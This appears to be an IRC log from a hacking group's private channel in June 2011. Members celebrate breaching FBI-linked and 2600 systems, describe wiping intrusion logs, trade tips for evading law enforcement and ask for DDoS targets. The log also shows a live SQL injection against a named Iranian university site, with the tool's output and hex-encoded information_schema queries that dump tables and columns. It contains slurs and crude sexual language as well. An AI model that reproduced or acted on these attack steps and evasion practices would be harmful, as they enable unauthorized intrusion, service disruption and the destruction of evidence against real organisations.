<joepie91> it's cold <joepie91> :P <tflow> ah <tflow> nice <Neuron> joepie91: check it :P * joepie91_laptop back into bed <Neuron> Sabu: what servers did you end up buying? <Sabu> hold on neuron <Sabu> hop on twitter <Sabu> watch it expose <Sabu> explode <Neuron> watching <joepie91_laptop> twitter is raping my laptop :( <Neuron> its not so much raping me :/ <Neuron> im searching fbi hacked <joepie91_laptop> guys <joepie91_laptop> please <joepie91_laptop> stop using spaces in filenames <Neuron> joepie.... file\ space <joepie91_laptop> it breaks browsers, webservers, caching shitload of other shit <Neuron> :P or %20 <joepie91_laptop> I know <joepie91_laptop> but they still tend to break shit <joepie91_laptop> I've often had unexplainable errors on w <joepie91_laptop> <joepie91_laptop> <joepie91_laptop> <hsien> yoz <Neuron> o/ <hsien> hows it <joepie91_laptop> <Neuron> * Neuron <tflow> what's * Neuron that were fixed by removing spaces 3.75 load average... :

28.3 load average on a pentium 3 FUCK YE

brb need new ip has quit (Quit: leaving) anonops saying about this joepie91? (Neuron@HA-875.col.tt2aeb.IP) has joined #pure-el idk notlogged on from lappy lemme walk to my pc

<joepie91_laptop> <joepie91_laptop> <joepie91_laptop>

Jun 03 21:00:48 <Neuron> joepie91_laptop: what os? Jun 03 21:01:07 <joepie91> laptop = puppy linux Jun 03 21:01:24 <joepie91> tflow: people seem to think lulzsec is win Jun 03 21:01:26 <Neuron> no :P like what os for your box.. ubuntu,devian, centos,suse,fedora Jun 03 21:01:28 <joepie91> haven;t read much yet Jun 03 21:01:31 <joepie91> I'm tired Jun 03 21:01:32 <joepie91> oh Jun 03 21:01:33 <joepie91> derp Jun 03 21:01:41 * joepie91 saw laptop and OS in one sentence Jun 03 21:01:43 <joepie91> debian of course Jun 03 21:01:45 <joepie91> :D Jun 03 21:04:01 <tflow> http://pastebin.com/kixK4rfu Jun 03 21:04:13 <tflow> blackhat seo, trying to capitilize on lulzsec lol Jun 03 21:04:21 <tflow> but how the fk did it get 18k views Jun 03 21:06:47 <joepie91_laptop> tflow Jun 03 21:06:50 <joepie91_laptop> proxy view increaser Jun 03 21:06:53 <joepie91_laptop> or similar tools Jun 03 21:07:02 <joepie91_laptop> http://www.sven-slootweg.nl/downloads Jun 03 21:07:05 <joepie91_laptop> I have a really crappy one Jun 03 21:07:09 <joepie91_laptop> that I made for someone a long time ago Jun 03 21:08:07 <Neuron> joepie91_laptop: check pm Jun 03 21:08:36 <joepie91_laptop> I know :P Jun 03 21:08:37 <joepie91_laptop> sec Jun 03 21:12:54 <joepie91_laptop> Sabu, tflow, Topiary Jun 03 21:12:55 <joepie91_laptop> <cedr>[18:06:30] <cedr> Fuck FBI Friday (FFF).rar is not RAR archive - ah well. Jun 03 21:12:56 <joepie91_laptop> <cedr>[18:06:52] <cedr> ohh Jun 03 21:12:56 <joepie91_laptop> <cedr>[18:06:55] <cedr> its a fucking .z ip Jun 03 21:12:56 <joepie91_laptop> <cedr>[18:06:57] <cedr> fail Jun 03 21:12:56 <joepie91_laptop> <cedr>did they purposely name their zip archive .rar? :p Jun 03 21:13:27 <tflow> wat Jun 03 21:13:32 <joepie91_laptop> idk Jun 03 21:13:40 <hsien> dude weird Jun 03 21:13:41 <tflow> we've never uploaded any rar/zip archive Jun 03 21:13:48 <hsien> i owned a box named cedr Jun 03 21:13:48 <joepie91_laptop> it's the torrent Jun 03 21:13:55 <joepie91_laptop> also, if someone has a pastebin account or feels like making one... report that spam submission :D Jun 03 21:14:02 * Topiary trollface.bat Jun 03 21:14:09 <joepie91_laptop> lol Jun 03 21:14:11 <joepie91_laptop> Topiary Jun 03 21:14:13 <Topiary> I made a zip and called it rar because it trolls the shit out of faggots Jun 03 21:14:14 <joepie91_laptop> as I just said Jun 03 21:14:24 <joepie91_laptop> if you want epic over 9000 end boss bonu s level points Jun 03 21:14:29 <joepie91_laptop> make cloudflare accept bitcoins Jun 03 21:14:31 <joepie91_laptop> for their Pro package Jun 03 21:14:50 <joepie91_laptop> :D Jun 03 21:40:32 * t[2] (t@HA-tbl.rkn.75e5ku.IP) has joined #pure-elite Jun 03 21:43:27 * Topiary has quit (Ping timeout: 121 seconds) Jun 03 21:44:31 * t[2] has quit (Quit: ==>) Jun 03 21:45:03 * Topiary (t@HA-tbl.rkn.75e5ku.IP) has joined #pure-elite Jun 03 21:58:56 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 21:59:16 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e

Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 what Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03 Jun 03

22:02:53 22:02:59 22:03:03 22:03:06 22:03:06 22:03:09 22:03:09 22:03:10 22:03:13 22:03:13 22:03:15 22:03:16 22:03:27 22:03:28 22:03:28 22:04:09 22:04:11 22:04:18 22:05:31 22:07:08 22:07:12 22:07:19 22:07:22 22:07:25 22:07:25 22:29:42 22:29:54 22:29:56 22:30:07 22:30:22 22:30:32 22:30:33 22:30:34 22:43:27 22:43:37 22:44:15 23:28:15 23:28:16 23:31:10 23:31:18 23:31:23 23:31:27 23:31:32 23:31:36 23:31:42 23:31:49 23:31:55 23:31:58 23:31:59 23:32:01 23:32:04 23:32:06 23:32:08 23:32:14 23:33:53 23:33:53 23:34:06 23:34:12 23:34:16

<joepie91_laptop> wel <joepie91_laptop> I think it's time for me <joepie91_laptop> to meet with Mr. Dream <joepie91_laptop> goodnight all <Recursion> holy shit <joepie91_laptop> ? <Sabu> hi <Recursion> wtf happened today? <Sabu> a lot ;) <joepie91_laptop> lolol <Sabu> check twitter <Sabu> ROFL <joepie91_laptop> lulzsec declared war to the US? <joepie91_laptop> :P <Recursion> I caught the jist of it <joepie91_laptop> but really <joepie91_laptop> night guys <Recursion> g'night <storm> yo <storm> went swimming <storm> had some beers <storm> toked on my e cigarette <storm> good night man <storm> good night <storm> :D * Recursion has quit (Quit: leaving) <Sabu> hi <Sabu> well guys <Sabu> those of you that are still with us through this <Sabu> maintain alert, make sure you're behind vpns dont matter <Sabu> and dont fear <Sabu> we're ok <Sabu> w/i n2 <Neuron> back <Sabu> sup neuron <Neuron> Sabu: did we lose people? <storm> agreed <storm> did we? <Sabu> yeah <storm> who? <Sabu> recursion and devurandom quit respectfully <Sabu> saying they are not up for the heat <Sabu> you realize we smacked the fbi today <Sabu> this means everyone in here <Sabu> must remain extremely secure <storm> Sabu <storm> did you wipe the pbs bd logs? <Sabu> yes <storm> k <Sabu> all pbs logs are clean <storm> then i'm game for some more <Sabu> ;) <Sabu> we're good <Sabu> we got a good team here <storm> hehe <storm> orly <Sabu> ;] <storm> so <storm> what did we do to the fbi

Jun 03 23:34:24 <Sabu> you dont know? Jun 03 23:34:25 <Sabu> ROFL Jun 03 23:34:28 <storm> nope Jun 03 23:34:30 <Sabu> twitter.com/lulzsec Jun 03 23:34:33 <storm> i was gone all day Jun 03 23:34:34 <Sabu> ravaged them tonight Jun 03 23:34:37 <storm> lmao Jun 03 23:39:02 <Neuron> O/ Jun 03 23:39:14 <Neuron> tflow: Yo Jun 03 23:40:06 <storm> After doing so, we contacted Karim and told him what we did. After a few discussions, he offered to Jun 03 23:40:06 <storm> pay us to eliminate his competitors through illegal hack ing means in return for our silence. Karim, Jun 03 23:40:06 <storm> a member of an FBI-related website, was willing to give us money and inside info in order to destroy Jun 03 23:40:07 <storm> his opponents in the whitehat world. We even discussed p lans for him to give us insider botnet information. Jun 03 23:40:09 <storm> ROFLMFAO Jun 03 23:40:10 <storm> ROFLMFAO Jun 03 23:40:11 <storm> wow Jun 03 23:40:16 <storm> epic reading Jun 03 23:40:32 <Neuron> Yo anyone have any extra tips for staying safe? Jun 03 23:43:08 <Sabu> clean your box out, make sure any sensitive info you hav e encrypted on a usb stick Jun 03 23:43:12 <Sabu> stay behind your vpn Jun 03 23:43:16 <Sabu> from now on your vpn is your weapon Jun 03 23:43:23 <Sabu> without your weapon you are nothing Jun 03 23:43:30 <Sabu> without you it is notihng blah blah blah Jun 03 23:43:34 <Neuron> haha Jun 03 23:43:39 <Sabu> and dont do nothing we dont approve of :D Jun 03 23:44:04 <Neuron> Alright right now.. My "hackbox" has 512 aes enc ryption on the entire harddrive Jun 03 23:44:18 <Neuron> two passwords and truecrypt on info concerning a nything hacking related Jun 03 23:44:24 <Neuron> and my vpn is HideMyAss Jun 03 23:44:43 <storm> sabu Jun 03 23:44:55 <storm> my netbook will be here win only a matter of days Jun 03 23:45:01 <storm> and ill be wiping my entire system Jun 03 23:45:05 <storm> desktop Jun 03 23:45:14 <storm> and just encrypting the entire drive Jun 03 23:45:16 <Neuron> im already wiping my enitre desktop Jun 03 23:45:16 <storm> after i scrub it Jun 03 23:45:58 <Sabu> yeah Jun 03 23:46:01 <Sabu> wipe it all Jun 03 23:46:04 <Sabu> im wiping all my shit now Jun 03 23:46:04 <Sabu> BUT Jun 03 23:47:09 <Neuron> ? Jun 03 23:47:57 <Sabu> storm: http://www.youtube.com/watch?v=SUlkAPxrwcw Jun 03 23:48:04 <Sabu> LOLOL thats my fav vid ever Jun 03 23:48:46 <Neuron> What do they call shells that have no logging Jun 03 23:48:48 <Neuron> i know theres a term Jun 03 23:50:22 <Neuron> "chaosbox" Jun 03 23:54:06 <storm> @LulzSec Ceasefire and we'll get you some sweatshirts. P lus a decent lawyer and movie agent if it comes to that. Your channels are resto red. Jun 03 23:54:11 <storm> from 2600 Jun 03 23:54:25 <storm> and lmao at that guy dancing Jun 03 23:55:00 <Sabu> dude Jun 03 23:55:28 <Neuron> ? Jun 03 23:56:26 <Sabu> that vid cracks me up

Jun 03 23:57:10 <storm> Sabu Jun 03 23:57:25 <Sabu> sups Jun 03 23:57:25 <storm> I'm amazed that 2600 took their beating like champs Jun 03 23:57:29 <storm> and sucked our cocks. Jun 03 23:57:30 <Sabu> yeh Jun 03 23:57:32 <Sabu> they did Jun 03 23:57:37 <Sabu> gotta understand though Jun 03 23:57:38 <storm> respect to that Jun 03 23:57:39 <storm> seriously Jun 03 23:57:42 <Sabu> they're old timers Jun 03 23:57:44 <Neuron> haha Jun 03 23:57:47 <Sabu> so they stil think like that Jun 03 23:57:55 <storm> heh Jun 03 23:57:58 <storm> well Jun 03 23:58:06 <storm> i feel abd for fucking their servers kinda Jun 03 23:58:06 <storm> ;x Jun 03 23:58:10 <storm> bad even Jun 03 23:58:13 <storm> but they deserved it Jun 03 23:58:15 <Neuron> lol Jun 03 23:58:24 <storm> that was lame that they took registration rights from ou r channel Jun 03 23:58:44 <Neuron> Anyone know if bt5 has a backdoor like bt4 black hat edition did? Jun 03 23:58:57 <storm> we Jun 03 23:58:58 <storm> er Jun 03 23:59:05 <storm> we're going to have a backtrack lulzsec version Jun 03 23:59:10 <storm> so it doesnt matter Jun 03 23:59:13 <storm> but it doesnt Jun 03 23:59:17 <storm> that i know of Jun 03 23:59:48 <Neuron> Hmm im debating of just setting my hackbox up ha s arch again Jun 03 23:59:53 <Neuron> Right now its bt5 Jun 04 00:00:03 <Neuron> but im weary it has a bd Jun 04 00:00:34 <storm> use ubuntu :D Jun 04 00:00:49 <storm> arch is cool if you like kde Jun 04 00:00:56 <Neuron> lol Jun 04 00:01:00 <Neuron> i use awesomewm :P Jun 04 00:01:06 <storm> or gentoo for customisable shit Jun 04 00:03:22 <Neuron> storm: im gonna setup arch again Jun 04 00:03:26 <storm> :D Jun 04 00:03:28 <Neuron> you guys won't see me for a few hours lol Jun 04 00:03:30 <storm> KDE is pretty Jun 04 00:03:36 <Neuron> i use awesome-wm Jun 04 00:03:36 <storm> alright Jun 04 00:03:38 <storm> later bra Jun 04 00:03:50 <Neuron> http://awesome.naquadah.org/ Jun 04 00:04:48 * storm has quit (Quit: BitchX-1.1-final -- just do it.) Jun 04 00:04:58 <Neuron> Sabu: be back in a bit bro Jun 04 00:05:26 <Sabu> kk Jun 04 00:06:34 * foolish (foolish@HA-n2d.mb1.tkrenp.IP) has joined #pureelite Jun 04 00:06:37 <foolish> there we go Jun 04 00:06:40 * foolish is now known as storm Jun 04 00:06:48 <storm> had to load up irssi Jun 04 00:07:21 <Neuron> lol Jun 04 00:07:22 <Neuron> wb Jun 04 00:07:25 <storm> tyty Jun 04 00:07:58 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 00:08:21 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit

e Jun 04 00:08:33 <Neuron> wb tflow Jun 04 00:29:07 <Neuron> alright guys im out for a bit for a arch install o/ Jun 04 00:29:12 * Neuron has quit (Quit: leaving) Jun 04 00:32:41 <Sabu> goodnight Jun 04 00:46:47 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 00:52:31 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure-el ite Jun 04 00:52:40 * anonny is now known as kl0ps Jun 04 00:52:45 <kl0ps> hello o/ Jun 04 00:57:53 <kl0ps> Sabu, lol, good morning :) ... i need a target :/ Jun 04 01:00:32 <lol> kl0ps hello \:D/ Jun 04 01:00:45 <kl0ps> \o/ Jun 04 01:00:54 <kl0ps> kayla :-* :D Jun 04 01:02:01 <lol> how are you :)? Jun 04 01:02:07 <kl0ps> lulzsec got in germany very famous too ;) Jun 04 01:02:16 <lol> ;) Jun 04 01:03:04 <kl0ps> goot, a little bit tired, but ok. i have to programming the hole day 4 study -.Jun 04 01:03:16 <kl0ps> i did not sleep this night Jun 04 01:03:22 <lol> why not :D? Jun 04 01:03:38 <kl0ps> party ;) Jun 04 01:03:53 <kl0ps> how are u sweety? Jun 04 01:04:29 <kl0ps> brb, buying beer. (yes the crazy germans) :D Jun 04 01:07:45 <kl0ps> re Jun 04 01:09:50 <kl0ps> lol, i have ti tried to sqli a iran uni, but i am mistak e. have u more luck then me? http://intstudy.ut.ac.ir/publication.php?sid=18 Jun 04 01:09:55 <kl0ps> -i +o Jun 04 01:10:28 <kl0ps> there is a vuln, but i am not able -.Jun 04 01:14:33 <kl0ps> what about i am talking? -.Jun 04 01:14:34 <kl0ps> [06:14:07] [INFO] target url appears to be UNION injecta ble with 6 columns Jun 04 01:14:40 <kl0ps> sry Jun 04 01:15:12 <kl0ps> web server operating system: Windows 2003 Jun 04 01:15:12 <kl0ps> web application technology: PHP 5.2.6, ASP.NET, Microsof t IIS 6.0 Jun 04 01:15:12 <kl0ps> back-end DBMS: MySQL 5.0.11 Jun 04 01:16:56 <lol> Count(table_name) of information_schema.tables Where tab le_schema=0x696E747374756479 is 12 Jun 04 01:16:56 <lol> Tables found: cnt,country,encountry,enmain,enmain2,ennew s,enpublication,gallery,main,main2,news,publication Jun 04 01:16:56 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x636E74 is 2 Jun 04 01:16:56 <lol> Columns found: id,count Jun 04 01:16:56 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x636F756E747279 is 7 Jun 04 01:16:56 <lol> Columns found: id,date,titr,body,lid,img,pdf Jun 04 01:16:56 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x656E636F756E747279 is 7 Jun 04 01:16:56 <lol> Columns found: id,date,titr,body,lid,img,pdf Jun 04 01:16:56 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x656E6D61696E is 6 Jun 04 01:16:56 <lol> Columns found: id,date,titr,body,img,pdf Jun 04 01:16:56 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x656E6D61696E32 is 6 Jun 04 01:16:57 <lol> Columns found: id,date,titr,body,img,pdf Jun 04 01:16:58 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x656E6E657773 is 7

Jun 04 01:16:59 <lol> Columns found: id,date,type,titr,body,lid,img Jun 04 01:17:00 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x656E7075626C69636174696F6E is 7 Jun 04 01:17:01 <lol> Columns found: id,date,type,titr,body,img,pdf Jun 04 01:17:02 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x67616C6C657279 is 3 Jun 04 01:17:03 <lol> Columns found: id,date,titr Jun 04 01:17:04 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x6D61696E is 6 Jun 04 01:17:05 <lol> Columns found: id,date,titr,body,img,pdf Jun 04 01:17:07 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x6D61696E32 is 6 Jun 04 01:17:07 <lol> Columns found: id,date,titr,body,img,pdf Jun 04 01:17:08 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x6E657773 is 7 Jun 04 01:17:09 <lol> Columns found: id,date,type,titr,body,lid,img Jun 04 01:17:10 <lol> Count(column_name) of information_schema.columns Where t able_schema=0x696E747374756479 AND table_name=0x7075626C69636174696F6E is 7 Jun 04 01:17:12 <lol> Columns found: id,date,type,titr,body,img,pdf Jun 04 01:17:13 <lol> doesn't look like there's any passwords in it Jun 04 01:17:27 <kl0ps> [06:17:18] [INFO] retrieved: "<p class="MsoNormal" style ="text-align: justify; line-height: 140%; margin: 0cm 0cm 10pt; unicode-bidi: em bed; direction: rtl; mso-margin-top-alt: auto; mso-margin-bottom-alt...[06:17:19 ] [INFO] retrieved: "<p class="MsoNormal" style="text-align: justify; line-heigh t: 140%; margin: 0cm 0cm 10pt; unicode-bidi: embed; direction: rtl; mso-margin-t op-alt: auto; mso-margin-bottom-alt...[06:17:20] [INFO] retrieved: "<p> Jun 04 01:17:27 <kl0ps> Jun 04 01:17:38 <kl0ps> ;) Jun 04 01:17:48 <kl0ps> i think so -.Jun 04 01:18:29 <kl0ps> i am dumping the db and we see Jun 04 01:20:59 <kl0ps> no hit -.Jun 04 01:27:49 * lol has quit (A TLS packet with unexpected length was re ceived.) Jun 04 01:28:03 * lol (lol@HA-372.t00.0st1iv.IP) has joined #pure-elite Jun 04 01:28:07 <kl0ps> http://skype-open-source.blogspot.com/ Jun 04 01:28:45 <kl0ps> without the fucking anti debuggers Jun 04 01:28:47 <lol> be back later im gonnag etsome rest <3 :) Jun 04 01:28:59 <kl0ps> hf Jun 04 01:29:13 <lol> :) Jun 04 01:29:58 * lol is now known as lol zzZZZZzz Jun 04 01:30:15 * lol zzZZZZzz is now known as lol away Jun 04 02:47:24 * kl0ps has quit (Ping timeout: 121 seconds) Jun 04 03:10:24 <storm> yooo Jun 04 03:10:57 * virtual (virtual@HA-bq2.skb.2n3ihv.IP) has joined #pureelite Jun 04 03:11:45 * virtual is now known as trollpoll Jun 04 03:11:48 <trollpoll> morning all Jun 04 03:11:50 <storm> sup troll Jun 04 03:12:25 <trollpoll> looking at lulzsec night fishes Jun 04 03:12:32 <storm> lol Jun 04 03:12:51 <trollpoll> and loling of course :P Jun 04 03:12:54 <storm> sabu Jun 04 03:13:07 <storm> where's my updated target list? Jun 04 03:13:14 <storm> :> Jun 04 03:13:19 <trollpoll> btw, dont you think that karim affair is more fo r Anonymous than for lulzsec? Jun 04 03:13:23 <storm> i need stuff to fire my cannons at Jun 04 03:13:36 <storm> trollpoll: no Jun 04 03:13:39 <storm> not personallu Jun 04 03:13:44 <storm> personally even

Jun 04 03:14:09 <trollpoll> because it happen after lulz hacking? Jun 04 03:15:50 <storm> I'm finally able to listen to our recording Jun 04 03:16:13 <trollpoll> well, anyway, everybody seems to assume that lul zsec = anonymous... Jun 04 03:16:43 <storm> well from wat ive seen Jun 04 03:16:48 <storm> i have seen the opposite Jun 04 03:16:58 <trollpoll> hmmm Jun 04 03:16:58 <storm> where people want anonymous to own us Jun 04 03:17:08 <trollpoll> lol Jun 04 03:18:22 <trollpoll> the first phrase Jun 04 03:18:23 <trollpoll> "It has come to our unfortunate attention that N ATO" Jun 04 03:18:33 <trollpoll> NATO was talking about Anonymous Jun 04 03:18:36 <trollpoll> not about lulzsec... Jun 04 03:19:22 <storm> I thought it was _anyone_ partaking in anti hacktivism p ersonally. Jun 04 03:20:17 <trollpoll> yes, but they focused on Anonymous Jun 04 03:20:44 <trollpoll> but, its ok... i just read yesterday something l ike "lulzsec a part of anonymous group".. Jun 04 03:21:12 <storm> they'll learn Jun 04 03:21:13 <storm> :p Jun 04 03:21:14 <trollpoll> or something like this in a web with some legal stuff about what we do Jun 04 03:22:58 <trollpoll> <Whirlpool> maybe an ATM fetishist ^_^ Jun 04 03:23:01 <trollpoll> epic lol Jun 04 03:23:20 <storm> loll Jun 04 03:26:56 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 04 03:27:13 <tflow> site still up \o/ Jun 04 03:27:18 <storm> yeah i noticed Jun 04 03:27:19 <storm> :D Jun 04 03:29:59 * trollpoll has quit (A TLS packet with unexpected length was received.) Jun 04 03:30:20 * trollpoll (rootgratz@HA-s5h.ho4.fu85s5.IP) has joined #p ure-elite Jun 04 03:31:39 <trollpoll> hey, is anonops.blogspot.com our? Jun 04 03:59:53 <storm> where's Topiary Jun 04 03:59:59 <storm> tweeting away no doubt Jun 04 04:00:42 <Topiary> ? Jun 04 04:00:45 <Topiary> just woke up Jun 04 04:01:48 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 04:02:45 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 04 04:09:49 <storm> lol Jun 04 04:09:51 <storm> sup? Jun 04 04:17:31 <storm> Topiary: Jun 04 04:17:34 * lol away is now known as lol Jun 04 04:17:41 <storm> I need an updated target list to ddos. Jun 04 04:18:02 <storm> 2600.net is old news Jun 04 04:18:13 <storm> hey Kayla Jun 04 04:18:14 <storm> <3 :D Jun 04 04:26:24 <Topiary> hmm not sure man Jun 04 04:35:51 * trollpoll has quit (Quit: Leaving) Jun 04 06:08:47 * neuron (neuron@HA-f21.345.a84vd3.IP) has joined #pure-el ite Jun 04 06:08:54 <neuron> lol took a bit longer then i thought Jun 04 06:09:46 * lol has quit (A TLS packet with unexpected length was re ceived.) Jun 04 06:09:57 * lol (lol@HA-r5m.i6c.9ln5eg.IP) has joined #pure-elite

Jun 04 06:10:15 <neuron> hey lol o. Jun 04 06:15:37 <lol> hey :D Jun 04 06:16:03 <neuron> what are you doing up this late :P Jun 04 06:16:19 <lol> :D Jun 04 06:16:22 <lol> nm :ppPPp Jun 04 06:16:41 <neuron> lol hax0ring stuff? Jun 04 06:22:56 <neuron> its 3am sleep tiem o./ Jun 04 06:23:02 * neuron has quit (Quit: leaving) Jun 04 06:39:02 <storm> O_o Jun 04 06:40:02 <lol> hi storm :D <3 Jun 04 06:40:20 <storm> hiya Jun 04 06:40:49 <lol> hows you? :D Jun 04 06:41:15 <storm> I'm OK. Jun 04 06:41:18 <storm> how're you? Jun 04 06:42:48 <lol> im fine thanks :D just a bit angry lol xD Jun 04 06:43:09 <lol> lololol i went to go get some cerials from down stairs a nd i opend my door Jun 04 06:43:23 <lol> and trapped my toe under the door when i opend it xD Jun 04 06:43:24 <lol> lmao Jun 04 06:43:28 <lol> it hurts :( Jun 04 06:43:33 <storm> ROFL Jun 04 06:43:35 <storm> wow. Jun 04 06:43:38 <storm> sounds painful. Jun 04 06:43:53 <lol> like the gap under the door xD Jun 04 06:43:59 <lol> :( Jun 04 06:44:20 <lol> now im just laid on my bed with my netbook feeling sorry for my self xD Jun 04 06:44:32 <lol> in pain! Jun 04 06:44:32 <lol> xD Jun 04 06:44:41 <storm> haha Jun 04 06:44:47 <storm> what kinda netbook does u haz? Jun 04 06:44:51 <storm> I'm getting one Jun 04 06:49:31 <lol> just a silly asus thing :D Jun 04 06:49:41 <lol> lol Jun 04 06:49:42 <lol> There are 0 users and 32 invisible on 1 servers Jun 04 06:49:42 <lol> 1 IRC Operators online Jun 04 06:49:42 <lol> 20 channels formed Jun 04 06:49:42 <lol> I have 32 clients and 0 servers Jun 04 06:49:42 <lol> Jun 04 06:49:42 <lol> Current local users: 32 Max: 32 Jun 04 06:49:42 <lol> Current global users: 32 Max: 32 Jun 04 06:49:42 <lol> Jun 04 06:49:42 <lol> Highest connection count: 32 (32 clients) (133 connectio ns received) Jun 04 06:49:42 <lol> Jun 04 06:49:43 <lol> collective.2600.net ------------------------------ Use rs: 32 (100.0%) Jun 04 06:49:44 <lol> End of /MAP Jun 04 06:49:53 <lol> lol 2600 is dead xD Jun 04 06:51:39 * joepie91 has quit (Ping timeout: 121 seconds) Jun 04 06:51:42 <storm> lol Jun 04 06:51:45 * joepie91 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pur e-elite Jun 04 06:51:46 <storm> i feel bad Jun 04 06:51:47 <storm> :< Jun 04 06:52:27 <storm> asus' are good netbooks Jun 04 06:52:38 <storm> i almost got one Jun 04 06:53:53 <lol> they good, but i should have really got one with a HDD r ather than an SSD because SSD's only have a certain ammount of writes Jun 04 06:54:04 <lol> so shredding everything with guttman can't be good for i

t :S Jun 04 06:54:20 <storm> lol. Jun 04 06:54:30 <storm> I'll be shredding my wntire system when my laptop comes Jun 04 06:54:36 <storm> entire even. Jun 04 06:54:40 <lol> DBAN :D Jun 04 06:54:51 <lol> use DBAN :DDD Jun 04 06:54:58 <lol> good old boot and nuke Jun 04 06:54:58 * storm duly noted Jun 04 06:55:22 <storm> i dont have much i wish to save Jun 04 06:55:35 <storm> maybe some porn, music, and some sensetive files Jun 04 06:55:39 <storm> :D Jun 04 06:56:09 <lol> lol xD Jun 04 07:00:29 <storm> im brushing my teeth >;x Jun 04 07:00:44 <lol> :D Jun 04 07:07:10 <joepie91> morning all Jun 04 07:07:14 <joepie91> also, om nom nom ddos Jun 04 07:07:29 <storm> lol Jun 04 07:07:29 <storm> hi Jun 04 07:13:30 <storm> 11:12 -!- madjack.2600.net -------------------------------- Users: 126 (22.2%) Jun 04 07:13:33 <storm> 11:12 -!- `- blackbeard.2600.net ------------------------- Users: 0 (0.0%) Jun 04 07:13:36 <storm> 11:12 -!- bartholomew.2600.net -------------------- Users: 105 (18.5%) Jun 04 07:13:40 <storm> 11:12 -!- djslocker.2600.net ---------------------- Users: 327 (57.7%) Jun 04 07:13:43 <storm> 11:12 -!`- services.2600.net ----------------------- Users: 9 Jun 04 07:13:45 <storm> collective was unlinked Jun 04 07:13:50 <lol> lol Jun 04 07:13:52 <lol> xD Jun 04 07:13:58 * t[2] (t@HA-5u1.rkn.75e5ku.IP) has joined #pure-elite Jun 04 07:14:03 <storm> ;p Jun 04 07:15:46 <t[2]> Account Balance is: 24.52 BTC (414.39 USD @ 16.90) Jun 04 07:15:48 <t[2]> our donations ^ Jun 04 07:15:49 <storm> kayla were you bottle_of_rum? Jun 04 07:15:54 <storm> jesus christ Jun 04 07:15:57 <storm> nice job Jun 04 07:16:24 <t[2]> bottle of rum = tflow Jun 04 07:17:12 * Topiary has quit (Ping timeout: 121 seconds) Jun 04 07:17:43 <tflow> kayla was parr0t Jun 04 07:18:32 <lol> why lol :D? Jun 04 07:18:38 <lol> i was parr0t ;3 Jun 04 07:21:17 * t[2] is now known as Topiary Jun 04 07:21:20 * Topiary has quit (Quit: -->) Jun 04 07:21:26 * Topiary (t@HA-5u1.rkn.75e5ku.IP) has joined #pure-elite Jun 04 07:21:36 <Topiary> exciting and new Jun 04 07:24:21 <Topiary> You have 38,739 followers Jun 04 07:24:34 <Topiary> http://pastebin.com/trends Jun 04 07:24:48 <tflow> we should really probably make a pastebin account Jun 04 07:25:10 <tflow> but already taken Jun 04 07:25:18 <tflow> http://pastebin.com/u/lulzsec Jun 04 07:32:13 <joepie91> @2600 Jun 04 07:32:14 <joepie91> 2600 Magazine Jun 04 07:32:14 <joepie91> Hacked websites, corporate infiltration/scandal, IRC wars, new hacker groups making global headlines - the 1990s are back! Jun 04 07:32:14 <joepie91> lol Jun 04 07:32:32 <joepie91> also Jun 04 07:32:38 <joepie91> fucking lol'd @ norton comment Jun 04 07:36:03 <joepie91> LOL

Jun 04 07:36:10 <joepie91> did you guys notice how practically noone report ed on the FBI hack? Jun 04 07:36:19 <tflow> that's because it's saturday Jun 04 07:36:26 <tflow> same thing happened with acs law Jun 04 07:36:31 <tflow> we released on friday Jun 04 07:36:35 <tflow> 0 reports Jun 04 07:36:38 <tflow> then come monday Jun 04 07:36:41 <tflow> 300 reports Jun 04 07:36:52 <joepie91> I know Jun 04 07:36:55 <joepie91> but even the blogs Jun 04 07:37:01 <joepie91> who are usually very quick with reporting on thi ngs Jun 04 07:37:08 <joepie91> haven't really written shit so far :p Jun 04 07:37:13 <tflow> true Jun 04 07:37:18 <tflow> like kerbs hasn't reported it yet Jun 04 07:37:23 <tflow> although sophos has Jun 04 07:37:27 <Topiary> a few have written on us Jun 04 07:37:29 <joepie91> ya, indeed, I noticed naked security Jun 04 07:37:41 <Topiary> International Business Times, cnet, Parmy is doi ng a piece later today Jun 04 07:38:03 <Topiary> LAtimes Jun 04 07:38:09 <joepie91> CNET, LA Times, IB Times, INQUISITR, Sophos Jun 04 07:38:11 <joepie91> that's my list atm Jun 04 07:38:34 <joepie91> http://www.inquisitr.com/111203/how-to-piss-offthe-fbi-hack-their-buddys-infragard-site/ Jun 04 07:38:39 <Topiary> yeah Jun 04 07:38:50 